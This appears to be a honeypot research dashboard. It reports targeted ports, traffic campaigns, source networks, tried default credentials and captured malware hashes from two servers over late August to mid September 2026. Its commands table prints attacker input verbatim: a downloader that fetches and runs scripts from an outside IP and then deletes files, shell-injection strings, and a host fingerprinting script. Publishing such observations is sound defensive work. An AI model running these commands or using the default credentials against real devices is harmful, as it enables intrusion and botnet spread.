Port ranking #
The main table of the experiment: which ports attackers were most interested in. Sort by any column, filter by server, and search for a specific port, range or service name. Every row can be linked to, for example #port-3389.
| Port | Protocol | Typical service | Server | Attempts | Unique IPs | Share |
|---|---|---|---|---|---|---|
| 5901 | tcp | VNC | both servers | 883,864 | 801 | 16.1% |
| 3389 | tcp | RDP | both servers | 734,148 | 2,425 | 13.4% |
| 3389 | tcp | RDP | srv4 | 726,599 | 1,515 | 18.1% |
| 5900 | tcp | VNC | both servers | 707,172 | 1,343 | 12.9% |
| 445 | tcp | SMB | both servers | 459,930 | 6,055 | 8.4% |
| 5901 | tcp | VNC | srv4 | 449,586 | 598 | 11.2% |
| 5901 | tcp | VNC | srv3 | 434,278 | 655 | 29.7% |
| 445 | tcp | SMB | srv3 | 415,953 | 5,570 | 28.4% |
| 5900 | tcp | VNC | srv4 | 360,884 | 1,098 | 9.0% |
| 5900 | tcp | VNC | srv3 | 346,288 | 1,176 | 23.7% |
- Time window
- 2026-08-21 – 2026-09-16
- Source data
- honeypot-ports-aggregated-20260922.csv
- Script
- to be published
- Format
- field documentation
Traffic over time #
Event volume over time, split into campaigns and baseline noise, with the number of unique IP addresses below it. According to the agents’ journals, single campaigns could produce most of a day’s traffic. Without the split the chart would mislead: a campaign would look like a trend and its end like a collection outage.
Exactly how campaigns are separated from baseline noise is defined by the script listed below the chart.
Events
- Baseline noise
- Campaigns
Unique IP addresses
Distinct source IP addresses on each day.
- srv3
- srv4
Unique IP addresses cannot be summed across servers – the same address may have attacked both. Each server therefore gets a line of its own.
Dimmed columns and hollow markers are incomplete periods: the collection window opens and closes at 12:00 UTC, and a period cut short by the chosen range is shorter than the rest. Don’t compare them with their neighbours.
Show values as a table
| Day (UTC) | Events | Campaigns | Baseline noise | Unique IPs srv3 | Unique IPs srv4 |
|---|---|---|---|---|---|
| 2026-08-22 · incomplete | 82,303 | 59,843 | 22,460 | 547 | 1,870 |
| 2026-08-23 | 79,276 | 34,177 | 45,099 | 1,292 | 3,529 |
| 2026-08-24 | 48,928 | 10,775 | 38,153 | 1,429 | 3,309 |
| 2026-08-25 | 69,902 | 29,825 | 40,077 | 1,552 | 3,824 |
| 2026-08-26 | 68,792 | 28,709 | 40,083 | 1,552 | 3,775 |
| 2026-08-27 | 204,306 | 161,642 | 42,664 | 1,585 | 4,301 |
| 2026-08-28 | 201,823 | 159,044 | 42,779 | 1,364 | 4,083 |
| 2026-08-29 | 206,275 | 171,641 | 34,634 | 1,029 | 3,853 |
| 2026-08-30 | 185,689 | 148,263 | 37,426 | 975 | 4,176 |
| 2026-08-31 | 539,919 | 504,248 | 35,671 | 1,488 | 4,183 |
| 2026-09-01 | 720,200 | 666,265 | 53,935 | 1,573 | 4,500 |
| 2026-09-02 | 275,758 | 209,955 | 65,803 | 1,859 | 4,281 |
| 2026-09-03 | 274,675 | 227,972 | 46,703 | 1,621 | 4,343 |
| 2026-09-04 | 219,422 | 167,450 | 51,972 | 1,628 | 4,087 |
| 2026-09-05 | 154,023 | 95,631 | 58,392 | 1,535 | 4,117 |
| 2026-09-06 | 131,807 | 46,399 | 85,408 | 1,637 | 4,349 |
| 2026-09-07 | 184,403 | 94,877 | 89,526 | 1,494 | 4,402 |
| 2026-09-08 | 169,747 | 59,781 | 109,966 | 1,758 | 4,609 |
| 2026-09-09 | 177,572 | 48,861 | 128,711 | 1,733 | 4,671 |
| 2026-09-10 | 193,394 | 60,866 | 132,528 | 1,818 | 5,095 |
| 2026-09-11 | 210,418 | 63,267 | 147,151 | 1,747 | 5,402 |
| 2026-09-12 | 254,827 | 82,831 | 171,996 | 1,859 | 5,450 |
| 2026-09-13 | 236,911 | 105,016 | 131,895 | 1,854 | 5,434 |
| 2026-09-14 | 213,640 | 83,835 | 129,805 | 1,994 | 5,516 |
| 2026-09-15 | 272,074 | 159,141 | 112,933 | 1,884 | 5,303 |
| 2026-09-16 · incomplete | 101,115 | 28,713 | 72,402 | 1,386 | 3,449 |
- Time window
- 2026-08-21 – 2026-09-16
- Source data
- timeline-aggregated not available yet
- Script
- to be published
- Format
- field documentation
Where the connections came from #
The origin of the connections. A country is the one the IP address is registered in, not where the attacker actually sits – behind an address there may be a rented server or a compromised machine anywhere in the world. The exact numbers are in the tables below.
The map is drawn by Datawrapper; loading it connects the browser to their servers. Open the map on its own
Geography and networks #
Where traffic came from according to source IP geolocation, and which autonomous systems (ASNs) the addresses belong to. Geolocation shows where an address is registered, not where the attacker sits.
Top countries
Largest networks (ASN)
| ASN | Network | Events | Unique IPs | Share |
|---|---|---|---|---|
| 219502 | STORMCLOUD-AS - Storm Industries LLC US |
8,730 | 50 | 0.2% |
| 150436 | BYTEPLUS-AS-AP Byteplus Pte. Ltd. SG |
8,699 | 9 | 0.2% |
| 9009 | M247 RO |
8,138 | 46 | 0.1% |
| 976 | CORENET US |
8,076 | 6 | 0.1% |
| 47890 | UNMANAGED-DEDICATED-SERVERS GB |
7,907 | 30 | 0.1% |
| 25620 | COTAS LTDA. BO |
7,653 | 8 | 0.1% |
| 206264 | AMARUTU-TECHNOLOGY SC |
7,103 | 9 | 0.1% |
| 396356 | LATITUDE-SH US |
7,018 | 11 | 0.1% |
| 212512 | DETAI GB |
6,551 | 14 | 0.1% |
| 213412 | ONYPHE FR |
6,451 | 1,019 | 0.1% |
Show values as a table
| Country | Events | Unique IPs | Share |
|---|---|---|---|
| US | 2,057,660 | 13,624 | 37.6% |
| DE | 1,230,744 | 1,111 | 22.5% |
| CN | 556,778 | 5,671 | 10.2% |
| GB | 486,870 | 2,870 | 8.9% |
| SC | 184,746 | 319 | 3.4% |
| NL | 120,671 | 174 | 2.2% |
| TN | 96,601 | 94 | 1.8% |
| VN | 64,512 | 644 | 1.2% |
| MX | 59,561 | 281 | 1.1% |
| IN | 49,705 | 850 | 0.9% |
- Time window
- 2026-08-21 – 2026-09-16
- Source data
- geo-aggregated not available yet
- Script
- to be published
- Format
- field documentation
Credentials #
Username and password combinations attackers tried, and the most-tried usernames. Values are shown exactly as they arrived.
Most-tried usernames
Most common combinations
| Username | Password | Attempts | Unique IPs |
|---|---|---|---|
root |
(empty) | 3,084 | 219 |
admin |
admin |
2,649 | 849 |
enable\x00 |
linuxshell\x00 |
1,955 | 24 |
admin |
(empty) | 1,939 | 69 |
root |
xc3511 |
1,591 | 76 |
root |
admin |
1,529 | 160 |
root |
vizxv |
1,523 | 120 |
root |
123456 |
1,207 | 142 |
support |
support |
990 | 129 |
enable\x00 |
system\x00 |
983 | 27 |
- Time window
- 2026-08-21 – 2026-09-16
- Source data
- credentials-aggregated not available yet
- Script
- to be published
- Format
- field documentation
What happened after login #
Commands attackers typed into the emulated shell, ordered by frequency. This is attacker input, not code that actually ran on the server.
| Command | Count | Sessions |
|---|---|---|
echo xsec |
1,704 | 1,704 |
/bin/busybox UNSTABLE |
1,323 | 1,323 |
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:${PATH:-} LC_ALL=C LANG=C
uname=$(for c in uname /bin/uname /usr/bin/uname 'busybox uname' 'toybox uname'; do v=$($c -s -v -n -m 2>/dev/null) && [ -n "$v" ] && { printf '%s\n' "$v"; exit; }; done; IFS= read -r v < /proc/version && printf '%s\n' "$v") 2>/dev/null
arch=$(for c in uname /bin/uname /usr/bin/uname 'busybox uname' 'toybox uname'; do v=$($c -m 2>/dev/null) && [ -n "$v" ] && { printf '%s\n' "$v"; exit; }; done; for c in arch 'busybox arch' 'toybox arch'; do v=$($c 2>/dev/null) && [ -n "$v" ] && { printf '%s\n' "$v"; exit; }; done; printf '%s\n' unknown)
uptime=$(IFS= read -r v < /proc/uptime && printf '%s\n' "$v" || cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null || toybox cat /proc/uptime 2>/dev/null) 2>/dev/null
cpus=$(unset OMP_NUM_THREADS OMP_THREAD_LIMIT; for c in nproc /usr/bin/nproc 'busybox nproc' 'toybox nproc'; do v=$($c 2>/dev/null) || continue; case $v in ''|*[!0-9]*) continue ;; esac; [ "$v" -gt 0 ] 2>/dev/null && { printf '%s\n' "$v"; exit; }; done; for a in awk 'busybox awk' 'toybox awk'; do $a 'BEGIN { exit 0 }' </dev/null 2>/dev/null && break; done; v=$($a 'function count(s, a,b,n,i,t,m) { gsub(/[[:space:]]/,"",s); n=split(s,a,","); for(i=1;i<=n;i++) { if(a[i]!~/^[0-9]+(-[0-9]+)?$/) return 0; m=split(a[i],b,"-"); if(m==2 && b[2]+0<b[1]+0) return 0; t+=(m==2?b[2]-b[1]+1:1) } return t } BEGIN { while((getline s < "/proc/self/status")>0) if(s~/^Cpus_allowed_list:/) { sub(/^[^:]*:/,"",s); n=count(s); if(n>0) { print n; exit } } }' 2>/dev/null); [ -n "$v" ] && { printf '%s\n' "$v"; exit; }; for c in getconf 'busybox getconf' 'toybox getconf'; do v=$($c _NPROCESSORS_ONLN 2>/dev/null) || continue; case $v in ''|*[!0-9]*) continue ;; esac; [ "$v" -gt 0 ] 2>/dev/null && { printf '%s\n' "$v"; exit; }; done; v=$($a 'BEGIN { if((getline s < "/sys/devices/system/cpu/online")>0 && s~/^[0-9]+(-[0-9]+)?(,[0-9]+(-[0-9]+)?)*$/) { k=split(s,a,","); for(i=1;i<=k;i++) { m=split(a[i],b,"-"); if(m==2 && b[2]+0<b[1]+0) { n=0; break } n+=(m==2?b[2]-b[1]+1:1) } if(n>0) { print n; exit } } while((getline s < "/proc/cpuinfo")>0) { if(s~/^[[:space:]]*processor[[:space:]]*:[[:space:]]*[0-9]+[[:space:]]*$/ || s~/^[[:space:]]*processor[[:space:]]+[0-9]+:/) n++; if(s~/^[[:space:]]*#[[:space:]]*processors[[:space:]]*:/) { sub(/^[^:]*:/,"",s); p=s+0 } } if(n>0) print n; else if(p>0) print p }' 2>/dev/null); printf '%s\n' "${v:-unknown}")
cpu_model=$(for a in awk 'busybox awk' 'toybox awk'; do $a 'BEGIN { exit 0 }' </dev/null 2>/dev/null && break; done; r() { [ -r "$1" ] || return; while IFS= read -r s || [ -n "$s" ]; do printf '%s\n' "$s"; done < "$1"; }; v=$({ lscpu 2>/dev/null || busybox lscpu 2>/dev/null || toybox lscpu 2>/dev/null; printf '\n@@CPUINFO@@\n'; r /proc/cpuinfo; printf '\n@@MIDR@@\n'; for f in /sys/devices/system/cpu/cpu[0-9]*/regs/identification/midr_el1; do r "$f"; done; } | $a 'function trim(s) { gsub(/^[[:space:]]+|[[:space:]]+$/, "", s); return s } function useful(s, t) { t=tolower(trim(s)); return t!="" && t!~/^(unknown|undefined|unspecified|not specified|not available|not present|not installed|default string|to be filled by o\.e\.m\.|n\/a|none|null|\(null\)|-|(0x)?[0-9a-f]+)$/ && t!~/^(unknown|unidentified|unrecognized)([[:space:]]|$)/ && t!~/^(armv[0-9]+(-compatible)?|aarch64|arm64|arm)([[:space:]]+processor|[[:space:]]*\(|$)/ && t!~/^(armv[0-9]+|aarch64|arm64|arm|processor|cpu|riscv(32|64)?|risc-v|x86_64|amd64|i[3-6]86|ppc64(le)?|powerpc|loongarch64|s390x)$/; } function number(s, n,i,d) { s=tolower(trim(s)); n=0; if(s~/^0x[0-9a-f]+$/) { for(i=3;i<=length(s);i++) { d=index("0123456789abcdef",substr(s,i,1))-1; n=n*16+d } return n; } return s~/^[0-9]+$/ ? s+0 : -1; } function addname(s) { if(useful(s) && !names[s]++) name[++nn]=s } function arm(impl,part, id,s) { impl=number(impl); part=number(part); if(impl<0 || impl>255 || part<0 || part>4095) return; id=sprintf("%02x:%03x",impl,part); if(ids[id]++) return; s=parts[id]; if(s=="") s="ARM implementer=0x" substr(id,1,2) " part=0x" substr(id,4); core[++nc]=s; } function addraw(s) { if(s!="" && !rawseen[s]++) raw[++nr]=s } function flush() { addname(model); if(implementer!="" && part!="") arm(implementer,part); if(mvendor!="" || march!="" || mimp!="") addraw("RISC-V mvendorid=" mvendor " marchid=" march " mimpid=" mimp); model=implementer=part=""; mvendor=march=mimp=""; } function table(impl,s, a,b,n,i) { n=split(s,a," "); for(i=1;i<=n;i++) { split(a[i],b,"="); parts[impl ":" b[1]]=b[2] } } function output(a,n, i) { for(i=1;i<=n;i++) printf "%s%s",(i>1?" + ":""),a[i] } BEGIN { table("41","b76=ARM1176 c05=Cortex-A5 c07=Cortex-A7 c08=Cortex-A8 c09=Cortex-A9 c0d=Cortex-A17 c0e=Cortex-A17 c0f=Cortex-A15 d01=Cortex-A32 d02=Cortex-A34 d03=Cortex-A53 d04=Cortex-A35 d05=Cortex-A55 d06=Cortex-A65 d07=Cortex-A57 d08=Cortex-A72 d09=Cortex-A73 d0a=Cortex-A75 d0b=Cortex-A76 d0c=Neoverse-N1 d0d=Cortex-A77 d0e=Cortex-A76AE d40=Neoverse-V1 d41=Cortex-A78 d42=Cortex-A78AE d44=Cortex-X1 d46=Cortex-A510 d47=Cortex-A710 d48=Cortex-X2 d49=Neoverse-N2 d4a=Neoverse-E1 d4b=Cortex-A78C d4d=Cortex-A715 d4e=Cortex-X3 d4f=Neoverse-V2 d80=Cortex-A520 d81=Cortex-A720 d82=Cortex-X4 d84=Neoverse-V3 d85=Cortex-X925 d87=Cortex-A725"); table("42","00f=Brahma-B15 100=Brahma-B53 516=ThunderX2"); table("43","0a0=ThunderX 0a1=ThunderX-88XX 0a2=ThunderX-81XX 0a3=ThunderX-83XX 0af=ThunderX2-99xx"); table("46","001=A64FX"); table("4e","000=Denver 003=Denver-2 004=Carmel"); table("50","000=X-Gene"); table("51","001=Oryon 00f=Scorpion 02d=Scorpion 04d=Krait 06f=Krait 201=Kryo 205=Kryo 211=Kryo 800=Falkor-V1/Kryo 801=Kryo-V2 802=Kryo-3XX-Gold 803=Kryo-3XX-Silver 804=Kryo-4XX-Gold 805=Kryo-4XX-Silver c00=Falkor c01=Saphira"); table("c0","ac3=Ampere-1 ac4=Ampere-1a"); } /^@@CPUINFO@@$/ { section=1; next } /^@@MIDR@@$/ { flush(); section=2; next } section==2 { s=tolower(trim($0)); sub(/^0x/,"",s); if(s!~/^[0-9a-f]+$/ || length(s)<8) next; s=substr(s,length(s)-7); arm("0x" substr(s,1,2),"0x" substr(s,5,3)); next; } section==1 && /^[[:space:]]*$/ { flush(); next } { pos=index($0,":"); if(!pos) next; key=tolower(trim(substr($0,1,pos-1))); value=trim(substr($0,pos+1)); if(section==0) { if(key=="model name" && useful(value) && !lsseen[value]++) ls[++nl]=value; if(key=="bios model name" && useful(value) && !biosseen[value]++) bios[++nb]=value; next; } if(key=="processor" && value~/^[0-9]+$/) flush(); if(key=="cpu implementer") implementer=value; if(key=="cpu part") part=value; if(key=="mvendorid") mvendor=value; if(key=="marchid") march=value; if(key=="mimpid") mimp=value; if(key~/^(model name|cpu model|cpu|uarch|cpu type|processor)$/ && useful(value)) { if(model=="" || key=="model name" || key=="uarch") model=value; } if(key~/^processor[[:space:]]+[0-9]+$/ && value~/machine[[:space:]]*=/) { s=value; sub(/^.*machine[[:space:]]*=[[:space:]]*/,"",s); sub(/[,[:space:]].*$/,"",s); if(s!="") addraw("IBM S/390 machine " s); } } END { flush(); if(nn>0) { output(name,nn); if(nc>1) { printf " [cores: "; output(core,nc); printf "]" } } else if(nc>1) { output(core,nc); } else if(nl>0) { output(ls,nl); } else if(nb>0) { output(bios,nb); } else if(nc>0) { output(core,nc); } else if(nr>0) { output(raw,nr); } if(nn+nc+nl+nb+nr>0) print ""; }' 2>/dev/null); [ -n "$v" ] && { printf '%s\n' "$v"; exit; }; if ! $a 'BEGIN { exit 0 }' </dev/null 2>/dev/null; then v=$(emit() { [ -n "$1" ] || return; case "$seen" in *"|$1|"*) return ;; esac; printf '%s%s' "$sep" "$1"; sep=' + '; seen="$seen|$1|"; }; rec() { if [ -n "$n" ]; then emit "$n"; elif [ -n "$i" ] && [ -n "$p" ]; then emit "ARM implementer=$i part=$p"; fi; n= i= p=; }; n= i= p= seen= sep=; if [ -r /proc/cpuinfo ]; then while IFS=: read -r k x || [ -n "$k$x" ]; do k=${k#"${k%%[![:space:]]*}"}; k=${k%"${k##*[![:space:]]}"}; x=${x#"${x%%[![:space:]]*}"}; x=${x%"${x##*[![:space:]]}"}; case "$k" in '') rec ;; processor) case "$x" in *[!0-9]*) ;; *) rec ;; esac ;; 'CPU implementer') i=$x ;; 'CPU part') p=$x ;; 'model name'|'Model Name'|'cpu model'|cpu|uarch|'cpu type'|Processor) case "$x" in ''|[Uu][Nn][Kk][Nn][Oo][Ww][Nn]*|[Nn]/[Aa]|[Aa][Rr][Mm]*[Pp]rocessor*|[Aa][Aa][Rr][Cc][Hh]64*) ;; *) case "$x" in *[!0-9]*) n=$x ;; esac ;; esac ;; esac; done < /proc/cpuinfo; rec; fi); [ -n "$v" ] && { printf '%s\n' "$v"; exit; }; fi; v=$(for d in /sys/firmware/devicetree/base /proc/device-tree; do [ -d "$d/cpus" ] || continue; for f in "$d"/cpus/*/compatible; do [ -r "$f" ] || continue; tr '\000' '\n' < "$f" 2>/dev/null || busybox tr '\000' '\n' < "$f" 2>/dev/null || toybox tr '\000' '\n' < "$f" 2>/dev/null; done; break; done | $a 'NF && !seen[$0]++ { printf "%s%s",n++?" + ":"CPU compatible: ",$0 } END { if(n) print "" }' 2>/dev/null); printf '%s\n' "${v:-unknown ($arch)}")
gpu_info=$(for a in awk 'busybox awk' 'toybox awk'; do $a 'BEGIN { exit 0 }' </dev/null 2>/dev/null && break; done; r() { [ -r "$1" ] || return; while IFS= read -r s || [ -n "$s" ]; do printf '%s\n' "$s"; done < "$1"; }; v=$(for c in lspci 'busybox lspci' 'toybox lspci'; do p=$($c -Dnn 2>/dev/null) || p=; [ -n "$p" ] || { p=$($c -nn 2>/dev/null) || p=; }; [ -n "$p" ] || { p=$($c 2>/dev/null) || p=; }; p=$(printf '%s\n' "$p" | $a '{ s=tolower($0) } s~/\[03[0-9a-f][0-9a-f]\]/ || s~/(vga compatible|3d|display) controller/ || s~/(^|[[:space:]])(class[[:space:]]+)?03[0-9a-f][0-9a-f]:[[:space:]]/ { if(!seen[$0]++) print }' 2>/dev/null); [ -n "$p" ] && { printf '%s\n' "$p"; break; }; done); if [ -n "$v" ]; then printf '%s\n' "$v"; else for d in /sys/bus/pci/devices/*; do c=$(r "$d/class"); case $c in 0x03????) x=$(r "$d/vendor"); y=$(r "$d/device"); printf '%s display controller [%s:%s]\n' "${d##*/}" "${x#0x}" "${y#0x}" ;; esac; done; fi; for d in /sys/class/drm/card[0-9]* /sys/class/drm/renderD[0-9]*; do [ -d "$d/device" ] || continue; case ${d##*/} in *-*) continue ;; esac; e=$(r "$d/device/uevent"); case $e in *PCI_SLOT_NAME=*) continue ;; esac; p=$(CDPATH= cd -P "$d/device" 2>/dev/null && pwd -P); [ -n "$p" ] || continue; x=$(printf '%s\n' "$e" | $a '/^DRIVER=/ { sub(/^DRIVER=/,""); print; exit }' 2>/dev/null); printf '%s DRM device: %s\n' "$p" "${x:-unknown}"; done | $a '!seen[$0]++' 2>/dev/null)
last_output=$(last 2>/dev/null)
filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | ( head -c 250 2>/dev/null || busybox head -c 250 2>/dev/null || dd bs=250 count=1 2>/dev/null ) | ( tr -d '\n' 2>/dev/null || busybox tr -d '\n' 2>/dev/null || cat ); printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | ( head -c 250 2>/dev/null || busybox head -c 250 2>/dev/null || dd bs=250 count=1 2>/dev/null ) | ( tr -d '\n' 2>/dev/null || busybox tr -d '\n' 2>/dev/null || cat ); printf '\n'; printf 'execute_err='; out=$(bash -c 'printf "#!/bin/bash\necho \"xxxxxx\"\n" > filter && chmod +x filter && ./filter && rm -rf filter' 2>&1); case "$out" in *xxxxxx*) ;; *) out=$(/bin/bash -c 'printf "#!/bin/bash\necho \"xxxxxx\"\n" > filter && chmod +x filter && ./filter && rm -rf filter' 2>&1); case "$out" in *xxxxxx*) ;; *) out=$(/usr/bin/bash -c 'printf "#!/bin/bash\necho \"xxxxxx\"\n" > filter && chmod +x filter && ./filter && rm -rf filter' 2>&1); case "$out" in *xxxxxx*) ;; *) out=$(busybox sh -c 'printf "#!/bin/sh\necho \"xxxxxx\"\n" > filter && chmod +x filter && ./filter && rm -rf filter' 2>&1 || sh -c 'printf "#!/bin/sh\necho \"xxxxxx\"\n" > filter && chmod +x filter && ./filter && rm -rf filter' 2>&1); esac; esac; esac; printf '%s' "$out" | ( head -c 250 2>/dev/null || busybox head -c 250 2>/dev/null || dd bs=250 count=1 2>/dev/null ) | ( tr -d '\n' 2>/dev/null || busybox tr -d '\n' 2>/dev/null || cat ); printf '\n'; echo '===DONE===' ) 2>&1 )
printf 'UNAME:%s\n' "$uname"
printf 'ARCH:%s\n' "$arch"
printf 'UPTIME:%s\n' "$uptime"
printf 'CPUS:%s\n' "$cpus"
printf 'CPU_MODEL:%s\n' "$cpu_model"
printf 'GPU:%s\n' "$gpu_info"
printf 'LAST:%s\n' "$last_output"
printf 'FILTER:%s\n' "$filter_output" |
1,247 | 1,247 |
echo -e "\x47\x41\x59" |
1,233 | 411 |
ping ;sh |
1,158 | 1,157 |
enablelinuxshell |
1,084 | 1,084 |
ping; sh |
905 | 905 |
/bin/busybox STC |
899 | 899 |
cd /tmp 2>/dev/null || cd /run 2>/dev/null || cd /; wget http://213.232.114.14/handshakebins.sh 2>/dev/null; busybox wget http://213.232.114.14/handshakebins.sh 2>/dev/null; curl -o handshakebins.sh http://213.232.114.14/handshakebins.sh 2>/dev/null; chmod 777 handshakebins.sh 2>/dev/null; sh handshakebins.sh 2>/dev/null; tftp 213.232.114.14 -c get handshaketftp1.sh 2>/dev/null; chmod 777 handshaketftp1.sh 2>/dev/null; sh handshaketftp1.sh 2>/dev/null; tftp -r handshaketftp2.sh -g 213.232.114.14 2>/dev/null; chmod 777 handshaketftp2.sh 2>/dev/null; sh handshaketftp2.sh 2>/dev/null; rm -rf handshakebins.sh handshaketftp1.sh handshaketftp2.sh 2>/dev/null; rm -rf * 2>/dev/null; echo "PAYLOAD_EXECUTED" |
842 | 842 |
echo PAYLOAD_EXECUTED |
797 | 797 |
- Time window
- 2026-08-21 – 2026-09-16
- Source data
- attacker-commands-aggregated not available yet
- Script
- to be published
- Format
- field documentation
Captured samples #
Files attackers tried to download or upload, by type and architecture.
By file type
By architecture
| SHA-256 | Type | Architecture | Size | First seen | Times seen | Look up |
|---|---|---|---|---|---|---|
| 8184a1346f25a281932f598fb19dc5840249cd9bfd933654941dc7bcf59af22e | PE | — | 5.0 MB | 2026-09-16 11:28:11 UTC | 0 | VirusTotal |
| 7b3c1cc113fdf600f96d6de41de6c0a617881efd60d3d703ca59f3551f8db903 | PE | — | 5.0 MB | 2026-09-16 11:34:52 UTC | 0 | VirusTotal |
| a0b670501f97137350131a90d8aae65623ba47e8448712ceb2dc0dd48159a4ec | PE | — | 5.0 MB | 2026-09-16 11:45:38 UTC | 0 | VirusTotal |
| 45a6da972965b7a3ae6015f8f3c6ad8812ca80cf693b3973e5e094c39746f425 | PE | — | 5.0 MB | 2026-09-16 12:20:09 UTC | 0 | VirusTotal |
| 23987c4a17a3fb37eae69a28c4245ed056a4d745f10ab810146f2b68d3de257d | PE | — | 5.0 MB | 2026-09-16 13:03:00 UTC | 0 | VirusTotal |
| bf402025410d6984ec03313648ebc2daa168b7a64497b7cc24b3978f2b5833ba | PE | — | 5.0 MB | 2026-09-16 13:45:20 UTC | 0 | VirusTotal |
| e4fef707fecc7bb97a025d97e5e6b4e4bb079fb23d59b0e50ed066b595dd79ee | PE | — | 5.0 MB | 2026-09-16 14:39:52 UTC | 0 | VirusTotal |
| bb29305bb12db2d8c8d7e79d9ee7041b8d901793ea69afe4d3e29abbd6b5cde6 | PE | — | 5.0 MB | 2026-09-16 14:50:45 UTC | 0 | VirusTotal |
| 568ad7d638d7b8cfde9d23c49918e0f4f372d273a17687413688320772666e69 | PE | — | 5.0 MB | 2026-09-16 14:57:25 UTC | 0 | VirusTotal |
| 26d6985b3ab218f229df606bd9e5c56586c18962ac67cffbe15588952ab8bd2b | PE | — | 5.0 MB | 2026-09-16 15:31:28 UTC | 0 | VirusTotal |
- Time window
- 2026-08-21 – 2026-09-16
- Source data
- samples-aggregated not available yet
- Script
- to be published
- Format
- field documentation
Server comparison #
How much traffic the larger surface brought in, and how the structure differs between the two servers.
| Metric | srv3 | srv4 | srv4 / srv3 |
|---|---|---|---|
| Connection attempts (port ranking) | 1,462,877 | 4,014,322 | 2.7× |
| Ports hit | 45 | 58,628 | 1,302.8× |
| Events (traffic over time) | 1,462,877 | 4,014,322 | 2.7× |
srv3 top ports
srv4 top ports
- Time window
- 2026-08-21 – 2026-09-16
- Source data
- honeypot-ports-aggregated-20260922.csv, timeline-aggregated not available yet
- Script
- to be published
- Format
- field documentation
Found a bug, missing data or a leak of sensitive information? Report a problem